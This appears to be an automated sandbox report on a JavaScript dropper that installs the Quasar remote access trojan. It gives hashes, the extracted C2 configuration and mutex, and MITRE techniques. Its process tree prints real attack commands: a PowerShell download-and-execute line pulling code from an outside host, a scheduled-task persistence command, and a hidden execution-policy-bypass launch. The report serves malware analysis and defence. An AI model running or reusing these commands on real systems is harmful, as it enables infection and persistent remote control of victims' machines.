quasar | b9ca6866ff2792c9472c7dfd63e58dac2b3d51157a3d5bea252c873a4ea29df5

General

Target

jod.js
Size

170KB
MD5

ea6103815cb06653775743a337f9d934
SHA1

9ec5e3f4bb4b39fcb61e0a5f15b0c6244a15ad60
SHA256

b9ca6866ff2792c9472c7dfd63e58dac2b3d51157a3d5bea252c873a4ea29df5
SHA512

7fd07e097673d14783117dd4180538ae0057530cecfb4eac14126f437272eb07e9bea10aed7ba610a9039a3ca9d08156d82e12bb89454abad1e29870e4797e73
SSDEEP

3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKL3bT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokXsbZ0M/EaZ8M

Score

10^/10

quasar op23 spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://propagandaetrafego.com/b.jpg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://propagandaetrafego.com/v1.txt

Extracted

Family

quasar

Version

2.7.0.0

Botnet

OP23

C2

vhf.sytes.net:4783

15.235.109.170:4782

Mutex

2vrOj8wCud9msk5z8w

Attributes

encryption_key
ywxbR3BS4B6Rtb7nv9vB
install_name
Venom.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Venom Client Startup

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3708-173-0x0000000000400000-0x0000000000510000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

6 4984 powershell.exe
46 4824 powershell.exe

flow	pid	process
6	4984	powershell.exe
46	4824	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

47 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4824 set thread context of 3708 4824 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4556 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4984 powershell.exe
4984 powershell.exe
4824 powershell.exe
4824 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeRegSvcs.exe

description pid process

Token: SeDebugPrivilege 4984 powershell.exe
Token: SeDebugPrivilege 4824 powershell.exe
Token: SeDebugPrivilege 3708 RegSvcs.exe

flow	ioc
47	ip-api.com

description	pid	process	target process
PID 4824 set thread context of 3708	4824	powershell.exe	RegSvcs.exe

pid	process
4556	schtasks.exe

pid	process
4984	powershell.exe
4984	powershell.exe
4824	powershell.exe
4824	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	3708	RegSvcs.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

wscript.exepowershell.exeWScript.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 4528 wrote to memory of 4984	4528	wscript.exe	powershell.exe
PID 4528 wrote to memory of 4984	4528	wscript.exe	powershell.exe
PID 4984 wrote to memory of 4556	4984	powershell.exe	schtasks.exe
PID 4984 wrote to memory of 4556	4984	powershell.exe	schtasks.exe
PID 4516 wrote to memory of 2064	4516	WScript.exe	cmd.exe
PID 4516 wrote to memory of 2064	4516	WScript.exe	cmd.exe
PID 2064 wrote to memory of 2304	2064	cmd.exe	cmd.exe
PID 2064 wrote to memory of 2304	2064	cmd.exe	cmd.exe
PID 2304 wrote to memory of 4824	2304	cmd.exe	powershell.exe
PID 2304 wrote to memory of 4824	2304	cmd.exe	powershell.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe
PID 4824 wrote to memory of 3708	4824	powershell.exe	RegSvcs.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\jod.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4984

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn PDF /tr C:\ProgramData\PDF\PDF.vbs
3⤵
- Creates scheduled task(s)
PID:4556

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PDF\PDF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\system32\cmd.exe
CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"
3⤵
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3708

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\PDF\1.bat
Filesize
89B

MD5
a7f20549327da521bf176b6faa76e623

SHA1
b9b22202b9d3d43ffa6cbf2f3f81dc7f5b06c605

SHA256
a2099940d9f7f9a0a603a5a36ef2b24eef49f2cb428539949a6d75261faaba46

SHA512
5cac6f996aa1bb4dd11a39d3001da243c6f020bc1a3d86a36ec773d45e479514b006e3b3d8782b1eaab628d0fefdb987495308b9c88f38667f875179771f4823

Download Submit
C:\ProgramData\PDF\PDF.ps1
Filesize
123KB

MD5
c88e3dee4837866917307a16170ffc48

SHA1
52600186a12ba1301d388a3d07a3ac1086c12375

SHA256
4662f9bc745e25e9af52df90590449772f8cc5a13c4c4ba13fbe42e7ecc82b73

SHA512
0b4edca40b32d9e4105fe79bdeace659253b626d15d6b218c8ea8f0288cacb2feb0644f1ef84a02bc9e402340910a2c2b0d0ee13c5697b1cdddf0c4d0159bea3

Download Submit
C:\ProgramData\PDF\PDF.vbs
Filesize
120B

MD5
30e4773314799aa0e1fd7761cae6e609

SHA1
d1b5a371a7555e99a7602ae6ee8028ac0f0462c4

SHA256
dc592583d072f325b7a0a54d53499f32ef95c731344cc10400f0bb03e7db4720

SHA512
fcbeca634cb6fe2d0ea4f726f09b4a35917615467a562e9d73cd235cd337bb797fb6a996f0569e83f4f858c0226b84fbd2d0721bea47d1039e5ffe6ebca0bb8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
bb925cc5c32a817b61b5a68f00475ac2

SHA1
368bbcd93d46036334f385fe80a6315130a873f4

SHA256
cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11

SHA512
69688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cad7a24fb372d7f7411516e6fb5cedd1

SHA1
c143b980357e75d7fd80169852aa790df1921ff7

SHA256
b6a233799be83de594717e07ff39e1f42ad13cba9bb4cffb4002b37a306bef84

SHA512
bdd3169b8cb8e616d1b39868c5c76a3c138fd56a0388af9f990842edacafd7d1e49a305f63ef1b9e130ef93e86e5977ef5303bbbd6d0cc3151b17fc70706a356

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ekrsvbnd.01g.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3708-180-0x0000000006B90000-0x0000000006BCC000-memory.dmp

Filesize
240KB

Download
memory/3708-177-0x0000000005960000-0x0000000005970000-memory.dmp

Filesize
64KB

Download
memory/3708-178-0x0000000005B10000-0x0000000005B76000-memory.dmp

Filesize
408KB

Download
memory/3708-179-0x0000000006760000-0x0000000006772000-memory.dmp

Filesize
72KB

Download
memory/3708-173-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/3708-176-0x0000000005970000-0x0000000005A02000-memory.dmp

Filesize
584KB

Download
memory/3708-181-0x00000000072E0000-0x00000000072EA000-memory.dmp

Filesize
40KB

Download
memory/3708-175-0x0000000005DF0000-0x0000000006394000-memory.dmp

Filesize
5.6MB

Download
memory/3708-182-0x0000000005960000-0x0000000005970000-memory.dmp

Filesize
64KB

Download
memory/4824-170-0x0000022DC5360000-0x0000022DC5370000-memory.dmp

Filesize
64KB

Download
memory/4824-171-0x0000022DC5360000-0x0000022DC5370000-memory.dmp

Filesize
64KB

Download
memory/4824-169-0x0000022DC5360000-0x0000022DC5370000-memory.dmp

Filesize
64KB

Download
memory/4984-151-0x000001DBA6990000-0x000001DBA69A0000-memory.dmp

Filesize
64KB

Download
memory/4984-150-0x000001DBA6990000-0x000001DBA69A0000-memory.dmp

Filesize
64KB

Download
memory/4984-149-0x000001DBA6990000-0x000001DBA69A0000-memory.dmp

Filesize
64KB

Download
memory/4984-144-0x000001DBA6990000-0x000001DBA69A0000-memory.dmp

Filesize
64KB

Download
memory/4984-143-0x000001DBA6990000-0x000001DBA69A0000-memory.dmp

Filesize
64KB

Download
memory/4984-142-0x000001DBC1020000-0x000001DBC1042000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads